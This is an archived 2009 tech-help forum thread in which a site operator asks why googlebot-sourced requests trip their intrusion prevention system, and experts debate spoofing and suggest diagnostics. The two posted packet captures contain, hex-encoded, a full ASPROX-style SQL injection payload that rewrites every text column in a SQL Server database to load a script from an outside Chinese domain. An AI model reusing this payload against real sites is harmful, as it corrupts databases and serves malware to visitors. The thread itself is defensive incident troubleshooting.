Solved

Google used as a hacking tool - inadvertanty attacking my site

Posted on 2009-05-19
8
426 Views
Last Modified: 2013-11-29
Google is somehow being used or manipulated to attack our website.  We have an IPS that records all attack traffic.  At least 500 times a day, googlebot attempts to hit a few sites in our facility with either sql injection such as ASPROX.  Because our IPS blocks the traffic, googlebot is never able to index the pages.  The site itself is not compromised in anyway and we cannot seem to determine why google is trying to do this.  Because googlebots traffic is being blocked, it is continuing to hit the site relentlessly.

Some packet captures are below


Frame 1 (1484 bytes on wire, 1484 bytes captured)

    Arrival Time: May 19, 2009 04:16:02.248079000

    Time delta from previous packet: 0.000000000 seconds

    Time since reference or first frame: 0.000000000 seconds

    Frame Number: 1

    Packet Length: 1484 bytes

    Capture Length: 1484 bytes

    Protocols in frame: eth:ip:tcp:http

Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)

    Type: IP (0x0800)

Internet Protocol, Src: crawl-66-249-65-18.googlebot.com (66.249.65.18), Dst: www.coolabah.com (69.63.131.110)

    Version: 4

    Header length: 20 bytes

    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

        0000 00.. = Differentiated Services Codepoint: Default (0x00)

        .... ..0. = ECN-Capable Transport (ECT): 0

        .... ...0 = ECN-CE: 0

    Total Length: 1470

    Identification: 0xeb57 (60247)

    Flags: 0x04 (Don't Fragment)

        0... = Reserved bit: Not set

        .1.. = Don't fragment: Set

        ..0. = More fragments: Not set

    Fragment offset: 0

    Time to live: 56

    Protocol: TCP (0x06)

    Header checksum: 0x052a [correct]

        Good: True

        Bad : False

    Source: crawl-66-249-65-18.googlebot.com (66.249.65.18)

    Destination: www.coolabah.com (69.63.131.110)

Transmission Control Protocol, Src Port: 41347 (41347), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418

    Source port: 41347 (41347)

    Destination port: http (80)

    Sequence number: 0    (relative sequence number)

    Next sequence number: 1418    (relative sequence number)

    Acknowledgement number: 0    (relative ack number)

    Header length: 32 bytes

    Flags: 0x0010 (ACK)

        0... .... = Congestion Window Reduced (CWR): Not set

        .0.. .... = ECN-Echo: Not set

        ..0. .... = Urgent: Not set

        ...1 .... = Acknowledgment: Set

        .... 0... = Push: Not set

        .... .0.. = Reset: Not set

        .... ..0. = Syn: Not set

        .... ...0 = Fin: Not set

    Window size: 90

    Checksum: 0x9fda [correct]

    Options: (12 bytes)

        NOP

        NOP

        Time stamp: tsval 121714743, tsecr 0

    TCP segment data (1418 bytes)
 

0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.

0010  05 be eb 57 40 00 38 06 05 2a 42 f9 41 12 45 3f   ...W@.8..*B.A.E?

0020  83 6e a1 83 00 50 ce cb d3 62 d5 94 b0 51 80 10   .n...P...b...Q..

0030  00 5a 9f da 00 00 01 01 08 0a 07 41 38 37 00 00   .Z.........A87..

0040  00 00 47 45 54 20 2f 73 70 6f 72 74 2f 6d 61 67   ..GET /sport/mag

0050  70 69 65 73 2e 63 66 6d 3f 3b 44 45 43 4c 41 52   pies.cfm?;DECLAR

0060  45 25 32 30 40 53 25 32 30 43 48 41 52 28 34 30   E%20@S%20CHAR(40

0070  30 30 29 3b 53 45 54 25 32 30 40 53 3d 43 41 53   00);SET%20@S=CAS

0080  54 28 30 78 34 34 34 35 34 33 34 43 34 31 35 32   T(0x4445434C4152

0090  34 35 32 30 34 30 35 34 32 30 37 36 36 31 37 32   4520405420766172

00a0  36 33 36 38 36 31 37 32 32 38 33 32 33 35 33 35   6368617228323535

00b0  32 39 32 43 34 30 34 33 32 30 37 36 36 31 37 32   292C404320766172

00c0  36 33 36 38 36 31 37 32 32 38 33 34 33 30 33 30   6368617228343030

00d0  33 30 32 39 32 30 34 34 34 35 34 33 34 43 34 31   3029204445434C41

00e0  35 32 34 35 32 30 35 34 36 31 36 32 36 43 36 35   5245205461626C65

00f0  35 46 34 33 37 35 37 32 37 33 36 46 37 32 32 30   5F437572736F7220

0100  34 33 35 35 35 32 35 33 34 46 35 32 32 30 34 36   435552534F522046

0110  34 46 35 32 32 30 37 33 36 35 36 43 36 35 36 33   4F522073656C6563

0120  37 34 32 30 36 31 32 45 36 45 36 31 36 44 36 35   7420612E6E616D65

0130  32 43 36 32 32 45 36 45 36 31 36 44 36 35 32 30   2C622E6E616D6520

0140  36 36 37 32 36 46 36 44 32 30 37 33 37 39 37 33   66726F6D20737973

0150  36 46 36 32 36 41 36 35 36 33 37 34 37 33 32 30   6F626A6563747320

0160  36 31 32 43 37 33 37 39 37 33 36 33 36 46 36 43   612C737973636F6C

0170  37 35 36 44 36 45 37 33 32 30 36 32 32 30 37 37   756D6E7320622077

0180  36 38 36 35 37 32 36 35 32 30 36 31 32 45 36 39   6865726520612E69

0190  36 34 33 44 36 32 32 45 36 39 36 34 32 30 36 31   643D622E69642061

01a0  36 45 36 34 32 30 36 31 32 45 37 38 37 34 37 39   6E6420612E787479

01b0  37 30 36 35 33 44 32 37 37 35 32 37 32 30 36 31   70653D2775272061

01c0  36 45 36 34 32 30 32 38 36 32 32 45 37 38 37 34   6E642028622E7874

01d0  37 39 37 30 36 35 33 44 33 39 33 39 32 30 36 46   7970653D3939206F

01e0  37 32 32 30 36 32 32 45 37 38 37 34 37 39 37 30   7220622E78747970

01f0  36 35 33 44 33 33 33 35 32 30 36 46 37 32 32 30   653D3335206F7220

0200  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D

0210  33 32 33 33 33 31 32 30 36 46 37 32 32 30 36 32   323331206F722062

0220  32 45 37 38 37 34 37 39 37 30 36 35 33 44 33 31   2E78747970653D31

0230  33 36 33 37 32 39 32 30 34 46 35 30 34 35 34 45   363729204F50454E

0240  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43

0250  37 35 37 32 37 33 36 46 37 32 32 30 34 36 34 35   7572736F72204645

0260  35 34 34 33 34 38 32 30 34 45 34 35 35 38 35 34   544348204E455854

0270  32 30 34 36 35 32 34 46 34 44 32 30 32 30 35 34   2046524F4D202054

0280  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572

0290  37 33 36 46 37 32 32 30 34 39 34 45 35 34 34 46   736F7220494E544F

02a0  32 30 34 30 35 34 32 43 34 30 34 33 32 30 35 37   2040542C40432057

02b0  34 38 34 39 34 43 34 35 32 38 34 30 34 30 34 36   48494C4528404046

02c0  34 35 35 34 34 33 34 38 35 46 35 33 35 34 34 31   455443485F535441

02d0  35 34 35 35 35 33 33 44 33 30 32 39 32 30 34 32   5455533D30292042

02e0  34 35 34 37 34 39 34 45 32 30 36 35 37 38 36 35   4547494E20657865

02f0  36 33 32 38 32 37 37 35 37 30 36 34 36 31 37 34   6328277570646174

0300  36 35 32 30 35 42 32 37 32 42 34 30 35 34 32 42   65205B272B40542B

0310  32 37 35 44 32 30 37 33 36 35 37 34 32 30 35 42   275D20736574205B

0320  32 37 32 42 34 30 34 33 32 42 32 37 35 44 33 44   272B40432B275D3D

0330  32 37 32 37 32 32 33 45 33 43 32 46 37 34 36 39   2727223E3C2F7469

0340  37 34 36 43 36 35 33 45 33 43 37 33 36 33 37 32   746C653E3C736372

0350  36 39 37 30 37 34 32 30 37 33 37 32 36 33 33 44   697074207372633D

0360  32 32 36 38 37 34 37 34 37 30 33 41 32 46 32 46   22687474703A2F2F

0370  37 37 37 37 37 37 33 33 32 45 37 33 37 33 33 31   777777332E737331

0380  33 31 37 31 36 45 32 45 36 33 36 45 32 46 36 33   31716E2E636E2F63

0390  37 33 37 32 37 33 37 33 32 46 37 37 32 45 36 41   737273732F772E6A

03a0  37 33 32 32 33 45 33 43 32 46 37 33 36 33 37 32   73223E3C2F736372

03b0  36 39 37 30 37 34 33 45 33 43 32 31 32 44 32 44   6970743E3C212D2D

03c0  32 37 32 37 32 42 35 42 32 37 32 42 34 30 34 33   27272B5B272B4043

03d0  32 42 32 37 35 44 32 30 37 37 36 38 36 35 37 32   2B275D2077686572

03e0  36 35 32 30 32 37 32 42 34 30 34 33 32 42 32 37   6520272B40432B27

03f0  32 30 36 45 36 46 37 34 32 30 36 43 36 39 36 42   206E6F74206C696B

0400  36 35 32 30 32 37 32 37 32 35 32 32 33 45 33 43   6520272725223E3C

0410  32 46 37 34 36 39 37 34 36 43 36 35 33 45 33 43   2F7469746C653E3C

0420  37 33 36 33 37 32 36 39 37 30 37 34 32 30 37 33   7363726970742073

0430  37 32 36 33 33 44 32 32 36 38 37 34 37 34 37 30   72633D2268747470

0440  33 41 32 46 32 46 37 37 37 37 37 37 33 33 32 45   3A2F2F777777332E

0450  37 33 37 33 33 31 33 31 37 31 36 45 32 45 36 33   73733131716E2E63

0460  36 45 32 46 36 33 37 33 37 32 37 33 37 33 32 46   6E2F63737273732F

0470  37 37 32 45 36 41 37 33 32 32 33 45 33 43 32 46   772E6A73223E3C2F

0480  37 33 36 33 37 32 36 39 37 30 37 34 33 45 33 43   7363726970743E3C

0490  32 31 32 44 32 44 32 37 32 37 32 37 32 39 34 36   212D2D2727272946

04a0  34 35 35 34 34 33 34 38 32 30 34 45 34 35 35 38   45544348204E4558

04b0  35 34 32 30 34 36 35 32 34 46 34 44 32 30 32 30   542046524F4D2020

04c0  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375

04d0  37 32 37 33 36 46 37 32 32 30 34 39 34 45 35 34   72736F7220494E54

04e0  34 46 32 30 34 30 35 34 32 43 34 30 34 33 32 30   4F2040542C404320

04f0  34 35 34 45 34 34 32 30 34 33 34 43 34 46 35 33   454E4420434C4F53

0500  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F

0510  34 33 37 35 37 32 37 33 36 46 37 32 32 30 34 34   437572736F722044

0520  34 35 34 31 34 43 34 43 34 46 34 33 34 31 35 34   45414C4C4F434154

0530  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F

0540  34 33 37 35 37 32 37 33 36 46 37 32 25 32 30 41   437572736F72%20A

0550  53 25 32 30 43 48 41 52 28 34 30 30 30 29 29 3b   S%20CHAR(4000));

0560  45 58 45 43 28 40 53 29 3b 20 48 54 54 50 2f 31   EXEC(@S); HTTP/1

0570  2e 31 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 63 6f   .1..Host: www.co

0580  6f 6c 61 62 61 68 2e 63 6f 6d 0d 0a 43 6f 6e 6e   olabah.com..Conn

0590  65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69   ection: Keep-ali

05a0  76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d   ve..Accept: */*.

05b0  0a 46 72 6f 6d 3a 20 67 6f 6f 67 6c 65 62 6f 74   .From: googlebot

05c0  28 61 74 29 67 6f 6f 67 6c 65 62 6f               (at)googlebo
 

-----------------------------------------------------------------------------------------------------

Frame 1 (1484 bytes on wire, 1484 bytes captured)

    Arrival Time: May 19, 2009 04:08:20.781412000

    Time delta from previous packet: 0.000000000 seconds

    Time since reference or first frame: 0.000000000 seconds

    Frame Number: 1

    Packet Length: 1484 bytes

    Capture Length: 1484 bytes

    Protocols in frame: eth:ip:tcp:http

Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)

    Type: IP (0x0800)

Internet Protocol, Src: crawl-66-249-71-152.googlebot.com (66.249.71.152), Dst: 69.63.131.111 (69.63.131.111)

    Version: 4

    Header length: 20 bytes

    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

        0000 00.. = Differentiated Services Codepoint: Default (0x00)

        .... ..0. = ECN-Capable Transport (ECT): 0

        .... ...0 = ECN-CE: 0

    Total Length: 1470

    Identification: 0xb69e (46750)

    Flags: 0x04 (Don't Fragment)

        0... = Reserved bit: Not set

        .1.. = Don't fragment: Set

        ..0. = More fragments: Not set

    Fragment offset: 0

    Time to live: 57

    Protocol: TCP (0x06)

    Header checksum: 0x325c [correct]

        Good: True

        Bad : False

    Source: crawl-66-249-71-152.googlebot.com (66.249.71.152)

    Destination: 69.63.131.111 (69.63.131.111)

Transmission Control Protocol, Src Port: 33193 (33193), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418

    Source port: 33193 (33193)

    Destination port: http (80)

    Sequence number: 0    (relative sequence number)

    Next sequence number: 1418    (relative sequence number)

    Acknowledgement number: 0    (relative ack number)

    Header length: 32 bytes

    Flags: 0x0010 (ACK)

        0... .... = Congestion Window Reduced (CWR): Not set

        .0.. .... = ECN-Echo: Not set

        ..0. .... = Urgent: Not set

        ...1 .... = Acknowledgment: Set

        .... 0... = Push: Not set

        .... .0.. = Reset: Not set

        .... ..0. = Syn: Not set

        .... ...0 = Fin: Not set

    Window size: 92

    Checksum: 0x6bf1 [correct]

    Options: (12 bytes)

        NOP

        NOP

        Time stamp: tsval 3656893948, tsecr 0

    TCP segment data (1418 bytes)
 

0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.

0010  05 be b6 9e 40 00 39 06 32 5c 42 f9 47 98 45 3f   ....@.9.2\B.G.E?

0020  83 6f 81 a9 00 50 de ea 73 7b 98 49 41 46 80 10   .o...P..s{.IAF..

0030  00 5c 6b f1 00 00 01 01 08 0a d9 f7 c5 fc 00 00   .\k.............

0040  00 00 47 45 54 20 2f 73 74 6f 72 79 31 31 38 2e   ..GET /story118.

0050  63 66 6d 3f 27 3b 44 45 43 4c 41 52 45 25 32 30   cfm?';DECLARE%20

0060  40 53 25 32 30 43 48 41 52 28 34 30 30 30 29 3b   @S%20CHAR(4000);

0070  53 45 54 25 32 30 40 53 3d 43 41 53 54 28 30 78   SET%20@S=CAST(0x

0080  34 34 34 35 34 33 34 43 34 31 35 32 34 35 32 30   4445434C41524520

0090  34 30 35 34 32 30 37 36 36 31 37 32 36 33 36 38   4054207661726368

00a0  36 31 37 32 32 38 33 32 33 35 33 35 32 39 32 43   617228323535292C

00b0  34 30 34 33 32 30 37 36 36 31 37 32 36 33 36 38   4043207661726368

00c0  36 31 37 32 32 38 33 34 33 30 33 30 33 30 32 39   6172283430303029

00d0  32 30 34 34 34 35 34 33 34 43 34 31 35 32 34 35   204445434C415245

00e0  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43

00f0  37 35 37 32 37 33 36 46 37 32 32 30 34 33 35 35   7572736F72204355

0100  35 32 35 33 34 46 35 32 32 30 34 36 34 46 35 32   52534F5220464F52

0110  32 30 37 33 36 35 36 43 36 35 36 33 37 34 32 30   2073656C65637420

0120  36 31 32 45 36 45 36 31 36 44 36 35 32 43 36 32   612E6E616D652C62

0130  32 45 36 45 36 31 36 44 36 35 32 30 36 36 37 32   2E6E616D65206672

0140  36 46 36 44 32 30 37 33 37 39 37 33 36 46 36 32   6F6D207379736F62

0150  36 41 36 35 36 33 37 34 37 33 32 30 36 31 32 43   6A6563747320612C

0160  37 33 37 39 37 33 36 33 36 46 36 43 37 35 36 44   737973636F6C756D

0170  36 45 37 33 32 30 36 32 32 30 37 37 36 38 36 35   6E73206220776865

0180  37 32 36 35 32 30 36 31 32 45 36 39 36 34 33 44   726520612E69643D

0190  36 32 32 45 36 39 36 34 32 30 36 31 36 45 36 34   622E696420616E64

01a0  32 30 36 31 32 45 37 38 37 34 37 39 37 30 36 35   20612E7874797065

01b0  33 44 32 37 37 35 32 37 32 30 36 31 36 45 36 34   3D27752720616E64

01c0  32 30 32 38 36 32 32 45 37 38 37 34 37 39 37 30   2028622E78747970

01d0  36 35 33 44 33 39 33 39 32 30 36 46 37 32 32 30   653D3939206F7220

01e0  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D

01f0  33 33 33 35 32 30 36 46 37 32 32 30 36 32 32 45   3335206F7220622E

0200  37 38 37 34 37 39 37 30 36 35 33 44 33 32 33 33   78747970653D3233

0210  33 31 32 30 36 46 37 32 32 30 36 32 32 45 37 38   31206F7220622E78

0220  37 34 37 39 37 30 36 35 33 44 33 31 33 36 33 37   747970653D313637

0230  32 39 32 30 34 46 35 30 34 35 34 45 32 30 35 34   29204F50454E2054

0240  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572

0250  37 33 36 46 37 32 32 30 34 36 34 35 35 34 34 33   736F722046455443

0260  34 38 32 30 34 45 34 35 35 38 35 34 32 30 34 36   48204E4558542046

0270  35 32 34 46 34 44 32 30 32 30 35 34 36 31 36 32   524F4D2020546162

0280  36 43 36 35 35 46 34 33 37 35 37 32 37 33 36 46   6C655F437572736F

0290  37 32 32 30 34 39 34 45 35 34 34 46 32 30 34 30   7220494E544F2040

02a0  35 34 32 43 34 30 34 33 32 30 35 37 34 38 34 39   542C404320574849

02b0  34 43 34 35 32 38 34 30 34 30 34 36 34 35 35 34   4C45284040464554

02c0  34 33 34 38 35 46 35 33 35 34 34 31 35 34 35 35   43485F5354415455

02d0  35 33 33 44 33 30 32 39 32 30 34 32 34 35 34 37   533D302920424547

02e0  34 39 34 45 32 30 36 35 37 38 36 35 36 33 32 38   494E206578656328

02f0  32 37 37 35 37 30 36 34 36 31 37 34 36 35 32 30   2775706461746520

0300  35 42 32 37 32 42 34 30 35 34 32 42 32 37 35 44   5B272B40542B275D

0310  32 30 37 33 36 35 37 34 32 30 35 42 32 37 32 42   20736574205B272B

0320  34 30 34 33 32 42 32 37 35 44 33 44 32 37 32 37   40432B275D3D2727

0330  32 32 33 45 33 43 32 46 37 34 36 39 37 34 36 43   223E3C2F7469746C

0340  36 35 33 45 33 43 37 33 36 33 37 32 36 39 37 30   653E3C7363726970

0350  37 34 32 30 37 33 37 32 36 33 33 44 32 32 36 38   74207372633D2268

0360  37 34 37 34 37 30 33 41 32 46 32 46 37 37 37 37   7474703A2F2F7777

0370  37 37 33 33 32 45 37 33 37 33 33 31 33 31 37 31   77332E7373313171

0380  36 45 32 45 36 33 36 45 32 46 36 33 37 33 37 32   6E2E636E2F637372

0390  37 33 37 33 32 46 37 37 32 45 36 41 37 33 32 32   73732F772E6A7322

03a0  33 45 33 43 32 46 37 33 36 33 37 32 36 39 37 30   3E3C2F7363726970

03b0  37 34 33 45 33 43 32 31 32 44 32 44 32 37 32 37   743E3C212D2D2727

03c0  32 42 35 42 32 37 32 42 34 30 34 33 32 42 32 37   2B5B272B40432B27

03d0  35 44 32 30 37 37 36 38 36 35 37 32 36 35 32 30   5D20776865726520

03e0  32 37 32 42 34 30 34 33 32 42 32 37 32 30 36 45   272B40432B27206E

03f0  36 46 37 34 32 30 36 43 36 39 36 42 36 35 32 30   6F74206C696B6520

0400  32 37 32 37 32 35 32 32 33 45 33 43 32 46 37 34   272725223E3C2F74

0410  36 39 37 34 36 43 36 35 33 45 33 43 37 33 36 33   69746C653E3C7363

0420  37 32 36 39 37 30 37 34 32 30 37 33 37 32 36 33   7269707420737263

0430  33 44 32 32 36 38 37 34 37 34 37 30 33 41 32 46   3D22687474703A2F

0440  32 46 37 37 37 37 37 37 33 33 32 45 37 33 37 33   2F777777332E7373

0450  33 31 33 31 37 31 36 45 32 45 36 33 36 45 32 46   3131716E2E636E2F

0460  36 33 37 33 37 32 37 33 37 33 32 46 37 37 32 45   63737273732F772E

0470  36 41 37 33 32 32 33 45 33 43 32 46 37 33 36 33   6A73223E3C2F7363

0480  37 32 36 39 37 30 37 34 33 45 33 43 32 31 32 44   726970743E3C212D

0490  32 44 32 37 32 37 32 37 32 39 34 36 34 35 35 34   2D27272729464554

04a0  34 33 34 38 32 30 34 45 34 35 35 38 35 34 32 30   4348204E45585420

04b0  34 36 35 32 34 46 34 44 32 30 32 30 35 34 36 31   46524F4D20205461

04c0  36 32 36 43 36 35 35 46 34 33 37 35 37 32 37 33   626C655F43757273

04d0  36 46 37 32 32 30 34 39 34 45 35 34 34 46 32 30   6F7220494E544F20

04e0  34 30 35 34 32 43 34 30 34 33 32 30 34 35 34 45   40542C404320454E

04f0  34 34 32 30 34 33 34 43 34 46 35 33 34 35 32 30   4420434C4F534520

0500  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375

0510  37 32 37 33 36 46 37 32 32 30 34 34 34 35 34 31   72736F7220444541

0520  34 43 34 43 34 46 34 33 34 31 35 34 34 35 32 30   4C4C4F4341544520

0530  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375

0540  37 32 37 33 36 46 37 32 25 32 30 41 53 25 32 30   72736F72%20AS%20

0550  43 48 41 52 28 34 30 30 30 29 29 3b 45 58 45 43   CHAR(4000));EXEC

0560  28 40 53 29 3b 20 48 54 54 50 2f 31 2e 31 0d 0a   (@S); HTTP/1.1..

0570  48 6f 73 74 3a 20 77 77 77 2e 6c 65 74 74 65 72   Host: www.letter

0580  66 72 6f 6d 6e 65 77 79 6f 72 6b 2e 63 6f 6d 0d   fromnewyork.com.

0590  0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65   .Connection: Kee

05a0  70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a   p-alive..Accept:

05b0  20 2a 2f 2a 0d 0a 46 72 6f 6d 3a 20 67 6f 6f 67    */*..From: goog

05c0  6c 65 62 6f 74 28 61 74 29 67 6f 6f               lebot(at)goo

Open in new window

0
Comment
Question by:vladfriedman
  • 3
  • 2
  • 2
  • +1
8 Comments
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 24426785
Bring this to the attention of Chris Shiflett, here: http://shiflett.org/

I am sure he will be interested and may have seen something similar that can help you out.

Best regards, ~Ray
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24479910
It seems unlikely it's really a google-bot... the traffic/IP can be spoofed, the attack could be real, it's just the attacker is hiding their packets by using a google-bot IP. Google-bot doesn't spend much time re-trying anything, that was what tells me that it's not really google, they move on quite quickly and typically only follow links and look for robots.txt
Google-bot first tries to find a robots.txt file, it tries in each directory it makes it into, I've looked in my apache logs after being crawled and there are plenty of 404's for the google-bot
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
0
 

Expert Comment

by:gdi67
ID: 24489578
I'm agree with richrumble. There are some tools to which use google to crawled in your website.
0
 

Author Comment

by:vladfriedman
ID: 24489630
It is the real google bot, it is originating from google owned IPs.  If I setup a page sql injection commands pointing to a destination site, and then had google index my page, it would thn try all of the links on my site which included the sql injection commands.

I know this is google.  The problem is not that google is originating the attack.  The trick is identifying the source page that was originally indexed.
0
Find Ransomware Secrets With All-Source Analysis

Ransomware has become a major concern for organizations; its prevalence has grown due to past successes achieved by threat actors. While each ransomware variant is different, we’ve seen some common tactics and trends used among the authors of the malware.

 
LVL 38

Accepted Solution

by:
Rich Rumble earned 500 total points
ID: 24489708
Try adding your site to the end of this URL
http://www.google.com/safebrowsing/diagnostic?site=
Like this:
http://www.google.com/safebrowsing/diagnostic?site=experts-exchange.com
Google keeps a strict log of when and where google-bot has been, and from my findings the URL above only needs about an hour to be updated, so if my site was crawled, 1hr later it's there. Subdomains however don't show up...
If you think it's not spoofed traffic, write to google they are helpful and might be able to better track down the issue and how they are leveraged to do this attack. I still think it's spoofed, unless your site is coolabah.com
http://www.google.com/safebrowsing/diagnostic?site=www.coolabah.com which is infested and has been for some time.
-rich
0
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 24493285
Regarding this: "It is the real google bot, it is originating from google owned IPs..." the IP address is external data can be faked.  Have you contacted Chris yet?

Best, ~Ray
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24494773
Was it spoofed? Or was it your IPS picking up on traffic being crawled on some web-pages, and not distributing via the google-bot crawler? Google-bot is a "getter" and not a "putter" (gbot is a reciever, not a sender)
-rich
0
 

Author Comment

by:vladfriedman
ID: 24497475
Hi Ray.  THe IP really can't can't be faked in our envionrment, and it is not being faked.
0

Featured Post

IT, Stop Being Called Into Every Meeting

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

Real-time is more about the business, not the technology. In day-to-day life, to make real-time decisions like buying or investing, business needs the latest information(e.g. Gold Rate/Stock Rate). Unlike traditional days, you need not wait for a fe…
Password hashing is better than message digests or encryption, and you should be using it instead of message digests or encryption.  Find out why and how in this article, which supplements the original article on PHP Client Registration, Login, Logo…
This video teaches users how to migrate an existing Wordpress website to a new domain.
Learn how to set-up PayPal payment integration in your Wufoo form. Allow your users to remit payment through PayPal upon completion of your online form. This is helpful for collecting membership payments, customer payments, donations, and more.

757 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now